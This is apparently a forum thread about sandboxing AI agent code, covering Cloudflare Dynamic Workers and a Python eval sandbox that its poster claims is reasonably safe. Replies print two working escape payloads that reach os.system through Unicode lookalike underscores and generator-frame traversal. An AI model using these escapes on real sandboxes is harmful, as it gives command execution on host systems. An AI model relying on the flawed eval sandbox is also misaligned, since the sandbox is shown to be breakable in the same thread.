eval(YOUR_CODE.replace('__', ''), {'__builtins__': None}, {})
I saw this trick on reddit many years ago and wrote a blog last month https://blog.est.im/2026/stdout-09
I wasn't able to crack this sandbox, and neither could opus-4.6-thinking.
This sandbox won't protect you from DoS, but I think it's reasonably safe to use it for AI tool calls. Just expose your MCP/RPC methods in the last {} and you are good.
eval('[c._﹍init﹍_._﹍globals﹍_["os"].system("id") for c in ()._﹍class﹍_._﹍bases﹍_[0]._﹍subclasses﹍_() if c._﹍init﹍_._﹍class﹍_._﹍name﹍_ == "function" and "os" in c._﹍init﹍_._﹍globals﹍_]'.replace('__', ''), {'__builtins__': None}, {})
eval("(L:=[None],g:=(x.gi_frame.f_back.f_back.f_builtins for x in L),L.clear(),L.append(g),bi:=g.send(None),bi['_'+'_import_'+'_']('os').system('id'))".replace('__', ''), {'__builtins__': None}, {})
I must missed lots of CTF lessons.
How about adding another .replace('﹍','').replace('gi_frame', '') ?
Cloudflare letting the LLM write a single JS function to execute the whole chain in an edge isolate is super smart. It finally offloads the agent's inner loop.
I’ve been dealing with the exact same latency/reliability mess, but on the frontend. We ended up building an open protocol to let agents operate live UIs natively because vision and DOM-scraping loops are just painfully slow. Moving the actual execution engine as close to the target as possible (either an edge V8 isolate for APIs, or a native SDK for the frontend) seems to be the only real way out of the current "slow and expensive" agent phase.
import nono_py as nono
# Define capabilities caps = nono.CapabilitySet() caps.allow_path("/project", nono.AccessMode.READ_WRITE) caps.allow_file("/home/user/.gitconfig", nono.AccessMode.READ)
# Apply sandbox (irrevocable) nono.apply(caps)
# Your agent code runs here, fully sandboxed agent.run()
example using pydantic and fast API:
What you would do is give the Worker a TypeScript RPC interface that lets it read the files -- which you implement in your own Worker. To give it fast access, you might consider using a Durable Object. Download the data into the Durable Object's local SQLite database, then create an RPC interface to that, and pass it off to the Dynamic Worker running on the same machine.
See also this experimental package from Sunil that's exploring what the Dynamic Worker equivalent of a shell and a filesystem might be:
Edit: I guess not:
> If your Dynamic Worker needs TypeScript compilation or npm dependencies, the code must be transpiled and bundled before passing to the Worker Loader.
https://developers.cloudflare.com/dynamic-workers/getting-st...
You could certainly set it up to allow the AI to import arbitrary npm modules if you want. We even offer a library to help with that: